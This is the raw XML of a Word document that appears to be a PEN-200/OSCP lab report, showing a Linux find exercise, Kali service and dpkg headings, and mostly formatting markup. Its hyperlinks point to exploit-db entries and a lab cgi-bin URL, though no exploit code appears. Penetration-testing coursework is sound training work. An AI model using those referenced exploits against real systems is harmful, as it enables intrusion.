      <w:r w:rsidR="00FA67B7">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FA67B7" w:rsidRPr="00FA67B7">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Kali virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE75942" w14:textId="08A1381B" w:rsidR="004436E0" w:rsidRDefault="004436E0" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EAB8F89" w14:textId="64482FAA" w:rsidR="004436E0" w:rsidRDefault="009E19A4" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="00CE32B3" w:rsidRPr="00CE32B3">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidR="00CE32B3" w:rsidRPr="009E19A4">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidR="00CE32B3" w:rsidRPr="00CE32B3">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t> to identify any file (not directory) modified in the last day, NOT owned by the root user and execute </w:t>
      </w:r>
      <w:r w:rsidR="00CE32B3" w:rsidRPr="009E19A4">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
      <w:r w:rsidR="00CE32B3" w:rsidRPr="00CE32B3">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t> on them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C632ECB" w14:textId="4406E389" w:rsidR="004436E0" w:rsidRDefault="004436E0" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5753C4AD" w14:textId="1927E761" w:rsidR="004436E0" w:rsidRDefault="009E19A4" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AE432A8" wp14:editId="5E590A7B">
            <wp:extent cx="5943580" cy="13366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5943580" cy="1336675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5902BBE2" w14:textId="588352F0" w:rsidR="009E19A4" w:rsidRDefault="009E19A4" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4111940F" w14:textId="4791FE71" w:rsidR="009E19A4" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc92471642"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.5.3 - Managing Kali Linux Services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="29BFF88A" w14:textId="44AE97E1" w:rsidR="009E19A4" w:rsidRDefault="009E19A4" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79057318" w14:textId="3239FCF4" w:rsidR="009E19A4" w:rsidRDefault="009E19A4" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E19A4">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Reporting is </w:t>
      </w:r>
      <w:r w:rsidRPr="009E19A4">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>not required</w:t>
      </w:r>
      <w:r w:rsidRPr="009E19A4">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t> for these exercises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E11A86" w14:textId="2819CF7B" w:rsidR="009E19A4" w:rsidRDefault="009E19A4" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CEC471" w14:textId="6CE0DCC6" w:rsidR="004436E0" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc92471643"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.6.6.1 - dpkg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="1F0641B8" w14:textId="77777777" w:rsidR="00A72D23" w:rsidRDefault="00A72D23" w:rsidP="00A72D23">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="254BBA26" w14:textId="6181492E" w:rsidR="004C32FD" w:rsidRDefault="009E19A4" w:rsidP="007204CC">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E19A4">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>Reporting is </w:t>
      </w:r>
      <w:r w:rsidRPr="009E19A4">
        <w:rPr>
          <w:b/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>not required</w:t>
      </w:r>
      <w:r w:rsidRPr="009E19A4">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t> for these exercises</w:t>
      </w:r>
      <w:r w:rsidR="007204CC">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E158AE" w14:textId="55A10E88" w:rsidR="00D14E89" w:rsidRDefault="00D14E89" w:rsidP="007204CC">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB76DDF" w14:textId="7DFEBE27" w:rsidR="00D14E89" w:rsidRDefault="00D14E89" w:rsidP="007204CC">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D1DC93" w14:textId="7E07B75C" w:rsidR="00D14E89" w:rsidRDefault="00D14E89" w:rsidP="007204CC">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAAD5F3" w14:textId="1DB494F8" w:rsidR="001D52DF" w:rsidRPr="007204CC" w:rsidRDefault="001D52DF" w:rsidP="007204CC">
      <w:pPr>
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001D52DF" w:rsidRPr="007204CC">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392B" w14:textId="77777777" w:rsidR="003949D6" w:rsidRDefault="003949D6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3C3BE5FD" w14:textId="77777777" w:rsidR="003949D6" w:rsidRDefault="0039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erif">
    <w:altName w:val="Cambria"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Roboto Bold">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Roboto Regular">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E10006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9126" w14:textId="77777777" w:rsidR="003949D6" w:rsidRDefault="003949D6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4F197D04" w14:textId="77777777" w:rsidR="003949D6" w:rsidRDefault="0039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8091" w14:textId="77777777"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r>
      <w:rPr>
        <w:rStyle w:val="None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8F1753"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E446BC4"/>
    <w:numStyleLink w:val="ImportedStyle1"/>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="176697487">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1232228760">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="774011910">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="212395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5370"/>
    <w:rsid w:val="00050C58"/>
    <w:rsid w:val="00052FCF"/>
    <w:rsid w:val="000A4CB7"/>
    <w:rsid w:val="000B0B14"/>
    <w:rsid w:val="000E0759"/>
    <w:rsid w:val="0015438B"/>
    <w:rsid w:val="00171737"/>
    <w:rsid w:val="00194DAA"/>
    <w:rsid w:val="0019713F"/>
    <w:rsid w:val="001A655D"/>
    <w:rsid w:val="001D52DF"/>
    <w:rsid w:val="00200461"/>
    <w:rsid w:val="00206457"/>
    <w:rsid w:val="00217AC6"/>
    <w:rsid w:val="00260A0B"/>
    <w:rsid w:val="002B5C2F"/>
    <w:rsid w:val="002C5D66"/>
    <w:rsid w:val="00320FAA"/>
    <w:rsid w:val="003274CC"/>
    <w:rsid w:val="00363D5A"/>
    <w:rsid w:val="003949D6"/>
    <w:rsid w:val="003A61DB"/>
    <w:rsid w:val="003B0095"/>
    <w:rsid w:val="003B03B0"/>
    <w:rsid w:val="003D0ADC"/>
    <w:rsid w:val="003E5820"/>
    <w:rsid w:val="00417905"/>
    <w:rsid w:val="004267EE"/>
    <w:rsid w:val="004436E0"/>
    <w:rsid w:val="00456261"/>
    <w:rsid w:val="0046389A"/>
    <w:rsid w:val="00474BAC"/>
    <w:rsid w:val="004A510E"/>
    <w:rsid w:val="004C32FD"/>
    <w:rsid w:val="004E5B78"/>
    <w:rsid w:val="004F5F59"/>
    <w:rsid w:val="00512B20"/>
    <w:rsid w:val="0052004E"/>
    <w:rsid w:val="00533824"/>
    <w:rsid w:val="00533CCE"/>
    <w:rsid w:val="005346E8"/>
    <w:rsid w:val="005435D6"/>
    <w:rsid w:val="0055776B"/>
    <w:rsid w:val="00586B50"/>
    <w:rsid w:val="005B136D"/>
    <w:rsid w:val="005C3B24"/>
    <w:rsid w:val="005C5FAB"/>
    <w:rsid w:val="0060389E"/>
    <w:rsid w:val="00620F73"/>
    <w:rsid w:val="00645BC2"/>
    <w:rsid w:val="00664B38"/>
    <w:rsid w:val="006671CB"/>
    <w:rsid w:val="006801DE"/>
    <w:rsid w:val="0068557D"/>
    <w:rsid w:val="007204CC"/>
    <w:rsid w:val="00761E91"/>
    <w:rsid w:val="00772DF2"/>
    <w:rsid w:val="007B1BAB"/>
    <w:rsid w:val="007B2A8E"/>
    <w:rsid w:val="00807E50"/>
    <w:rsid w:val="0082675B"/>
    <w:rsid w:val="00832E48"/>
    <w:rsid w:val="00854D15"/>
    <w:rsid w:val="00895202"/>
    <w:rsid w:val="00896343"/>
    <w:rsid w:val="008B3E32"/>
    <w:rsid w:val="008D0450"/>
    <w:rsid w:val="008E2D2A"/>
    <w:rsid w:val="009136E0"/>
    <w:rsid w:val="0093686D"/>
    <w:rsid w:val="0095025A"/>
    <w:rsid w:val="00963B09"/>
    <w:rsid w:val="00967E98"/>
    <w:rsid w:val="009E19A4"/>
    <w:rsid w:val="00A36A40"/>
    <w:rsid w:val="00A57464"/>
    <w:rsid w:val="00A72D23"/>
    <w:rsid w:val="00A74101"/>
    <w:rsid w:val="00A77D33"/>
    <w:rsid w:val="00A92560"/>
    <w:rsid w:val="00AE353F"/>
    <w:rsid w:val="00AE7F66"/>
    <w:rsid w:val="00AF7A65"/>
    <w:rsid w:val="00B05FA4"/>
    <w:rsid w:val="00B45108"/>
    <w:rsid w:val="00B91949"/>
    <w:rsid w:val="00B96009"/>
    <w:rsid w:val="00BA1474"/>
    <w:rsid w:val="00BB52B8"/>
    <w:rsid w:val="00BB687E"/>
    <w:rsid w:val="00BD3081"/>
    <w:rsid w:val="00BD54EE"/>
    <w:rsid w:val="00C23375"/>
    <w:rsid w:val="00C25F6B"/>
    <w:rsid w:val="00CD5102"/>
    <w:rsid w:val="00CE32B3"/>
    <w:rsid w:val="00D14E89"/>
    <w:rsid w:val="00D27F42"/>
    <w:rsid w:val="00D6306A"/>
    <w:rsid w:val="00D80F87"/>
    <w:rsid w:val="00DB6A85"/>
    <w:rsid w:val="00DF6897"/>
    <w:rsid w:val="00E4367D"/>
    <w:rsid w:val="00E5776C"/>
    <w:rsid w:val="00E82633"/>
    <w:rsid w:val="00E90E6C"/>
    <w:rsid w:val="00E97B19"/>
    <w:rsid w:val="00ED4831"/>
    <w:rsid w:val="00F23122"/>
    <w:rsid w:val="00F62DBA"/>
    <w:rsid w:val="00F715CC"/>
    <w:rsid w:val="00FA2A58"/>
    <w:rsid w:val="00FA67B7"/>
    <w:rsid w:val="00FB7299"/>
    <w:rsid w:val="00FD5193"/>
    <w:rsid w:val="00FE1D62"/>
    <w:rsid w:val="00FE5F03"/>
    <w:rsid w:val="00FF2A7E"/>
    <w:rsid w:val="186B2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24"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00AE353F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="BodyA"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00AE353F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="240" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:u w:color="17375E"/>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unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009E19A4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>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uiPriority w:val="39"/>
    <w:qFormat/>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9E19A4"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:noProof/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Block-Text">
    <w:name w:val="Block-Text"/>
    <w:basedOn w:val="BlockText"/>
    <w:qFormat/>
    <w:rsid w:val="001A655D"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:bCs/>
      <w:i w:val="0"/>
      <w:noProof/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:u w:color="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00963B09"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BlockText">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001A65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Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00AE353F"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="000E0759"/>
    <w:rPr>
      <w:rFonts w:ascii="Candara" w:hAnsi="Candara"/>
      <w:noProof/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="0053382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33824"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008D0450"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FA2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58"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>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E582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ploit-db.com/exploits/35513" TargetMode="Externa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p.offensive-security.com/hc/en-us/articles/360046787731-PEN-200-Reporting-Requirements"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1.1.71/cgi-bin/admin.cg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https://www.exploit-db.com/exploits/34900"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help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/35161" TargetMode="External"/><Relationship Id="rId22"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20B9-8445-6D4C-800C-9F2A2B86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2022-11-18T13:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-18T13:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>